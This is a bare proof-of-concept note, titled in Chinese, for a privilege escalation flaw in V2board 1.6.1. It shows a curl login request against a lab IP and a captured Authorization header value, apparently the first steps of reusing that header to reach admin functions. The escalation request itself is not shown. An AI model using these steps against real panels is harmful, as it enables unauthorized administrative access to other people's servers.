(V2board 1.6.1 提权)
V2board 1.6.1 提权漏洞






报文:curl -i -s -k -XPOST –data-binary “email=example%40example.com&password=Aa123.comAa” http://192.168.85.130:8080/api/v1/passport/auth/login


Authorization:ZXhhbXBsZUBleGFtcGxlLmNvbTokMnkkMTAkQy9YVjg3VUJDSm1iVDBVNE15M0V2ZVQvbDdrb2EuaFdHWEJ5ekJWTzVFN3dpL3FTWUw0b1M=;Cache-Control: max-age=0




